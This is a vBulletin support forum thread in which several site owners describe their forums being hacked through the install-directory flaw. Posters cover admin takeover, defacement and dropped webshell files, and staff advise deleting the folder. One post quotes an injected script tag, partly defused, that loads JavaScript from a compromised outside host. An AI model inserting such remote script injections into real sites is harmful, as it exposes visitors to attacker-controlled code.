I was hacked all so last night. My host said this,

It appears this was a typical post sent to the ajax on the back-end. These are taken care of by normal ModSecurity rules, but ModSecurity rules were set to defaults. As such, I've enabled additional ModSecurity rules to protect against this and many other common attack types, so this exact issue shouldn't happen again.



Here's the POST performed by that user:



"POST /forum/acp1/ajax.php

Sorry for hi jacking the thread but i was also hacked, my sie is working but right now when i was in admincp i clicked one of the help icons and it takes me to a team hacker egyt directory of my server. What should i do now??

Got a return hack today as well. I keep circling back to the question of how vBulletin could ship commercial software with such a gaping security hole.

This happened to me tonight and I tried to clear this by upgrading to 4.2.2 and all heck broke loose and I got errors all over the place. What can I do now? Thanks.

And no email was sent to EVERY owner whose email address they have in their files warning to REMOVE the INSTALL directory BEFORE we were all hacked. By the time I got the message in the Admincp, the SEA had already hacked my site. To be clear, I don't blame the mods here or the support staff, they did their best to help us afterwards, and they did. What was management thinking in NOT contacting everyone beforehand? I was up till 5am restoring the site and working to fix the damage.

1) It has nothing to do with FTP... Delete the FOLDER. It is the only way to prevent access.

2) Yes... If it is on your server they can reach it. This is why in no uncertain terms you should delete the folder like we've told you to do so.

3) It has value. However all instructions have been updated to delete the folder. You should do so immediately.

The issue was introduced in 4.1.0. That was released over 3 years go. Even if we emailed before we confirmed it, you're site was already at risk. As it is, most people are simply disregarding the email anyway.

Just reporting that this morning, Sunday Sep. 15, my forum 4.2.0 PL 2 was also hacked.

At this point it should be find for me to deal with ... just reporting. I will stage the latest 4 version and switch everything to the new files.

BUT ... how can I be sure that the problem is really fixed, even with the upgrade to 4.2.1?

The hacker used the username "lasttouch". lasttouch apparently registered as there is a registration date of today about 7 am ET, then accessed the Admin CP and promoted itself to Admin. Found some "hacker login code" as well that was the way into the Admin CP, I'm guessing.

I am not a hacker myself so I don't really know what I'm looking for ... I haven't really investigated thoroughly, but so far all I've found is inputting the
​Admin CP > Settings > Options > Site Name /URL/Contact > "Forum Name" box
with this script: (I added [invalidating code]just in case )

<script [invalidating code] src="http://kenningautoglass.co.za/wp-content/themes/famous/megaframe/megapanel/inc/lasttouch.js"></script>

So ... the hacker interfered with access, displayed a sort of medieval crest image that is so small and pixelated I can't read it, and a message "lasttouch was here".

Advice on making sure the LATEST version vb is secure is most welcome.

One related question. If you remove install, you cannot run the fix unique index function in maintenance. You get this error:

Was hacked today. Second time in a week. First time is was the Syrians and they put a notice. I didn't delete the install directory unfortunately. This time I cannot seem to get the hacker message off the forumhome.

-uploaded all new files
-deleted all new admin accounts
-deleted install dir
-checked modified files on server - nothing from this week
-checked announcements and notices and there is nothing new
-checked site name / URL / contact details page nothing there.
-disabled all plugins

My forum homepage is still the hacker message. How did he do this?

Edit: found some suspicious plugins in the vbulletin product delted them. Message still there.

Edit: It was the style that was edited. I reverted to another style and it got rid of the message.

Edit your FORUMHOME template and check it for extra code. If no extra code, just save it anyway.

I got hacked today. They deleted everything in my public_html directory and uploaded a bunch of their own files, which I suspect allowed others access.

The files they left were named;
index.php
cx.php
xxx.php (which appears to be some sort of access panel for my server!)
inbox php mailer 2013.php

See attached image of my hacked homepage.

I have a dedicated server with a bunch of different domains and sites including another vbulletin 4.x site.

The other vbulletin 4.x site was not defaced or visibly damaged but they also managed to access cpanel for the both domains that have the vbulletin4.x sites and used the other domain to send out spam, but the email addresses they were sending to do not appear to be our forum members.

I'm not sure what version of vbulletin was running on the site they deleted but I think it was below 4.2.1. The other site is running 4.2.0 PL2

In both cases the Install directory was NOT present, (we were hack previously and learned from that!).

The database belonging to the site that they deleted is still in place and it is reasonably easy to restore that site, but could they have left some sort of back door in the database?

Ditto for the site that is still intact - I am concerned that they may have left some sort of back door for later.